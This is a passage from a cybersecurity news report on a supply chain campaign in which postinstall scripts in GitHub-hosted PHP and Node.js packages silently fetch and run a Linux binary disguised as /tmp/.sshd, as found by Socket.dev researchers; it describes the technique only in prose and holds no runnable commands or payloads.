Hackers Hide Linux Payload Under SSH-Like Filename During Package Installation
Hackers Hide Linux Payload Under SSH-Like Filename During Package Installation
https://cybersecuritynews.com/hackers-hide-linux-payload-under-ssh-like-filename/
Publish Date: 2026-05-25 15:10:00
Source Domain: cybersecuritynews.com
A new supply chain attack campaign is quietly targeting developers through a method most would never think to look for.
Hidden inside software packages on GitHub, a malicious script downloads a Linux binary during installation and disguises it using a filename designed to look like a standard system process. The attack has now touched more than 700 repositories across multiple ecosystems.
The campaign works by planting a harmful postinstall script inside PHP and Node.js packages. When a developer installs an affected package, the script runs automatically without any visible warning.
It reaches out to an attacker-controlled GitHub account, pulls down a binary file, and saves it to a temporary folder on the victim’s Linux system under the name /tmp/.sshd, a path that mimics a legitimate SSH daemon file used by the operating system.
Researchers at Socket.dev said in a report shared with Cyber Security News (CSN) that they identified this campaign while investigating a set of flagged Packagist packages.
Their AI-powered scanner picked up on the suspicious install-time behavior, flagging packages as malicious based on how they handled binary downloads and background execution. The findings revealed a campaign far broader than the initial batch suggested.
The attack spreads across both Packagist and Node.js project repositories on GitHub. Investigators found that a GitHub account named parikhrpreksha served as the central delivery point for the payload.
The same postinstall command appeared consistently across hundreds of repositories, all pulling the same binary from the same GitHub Releases URL, pointing to a coordinated supply chain operation.
What makes this attack hard to catch is how effectively it hides its activity. The script suppresses error messages that might appear during installation and runs the downloaded binary silently in the background.
Developers reviewing standard install logs would see nothing unusual, and…
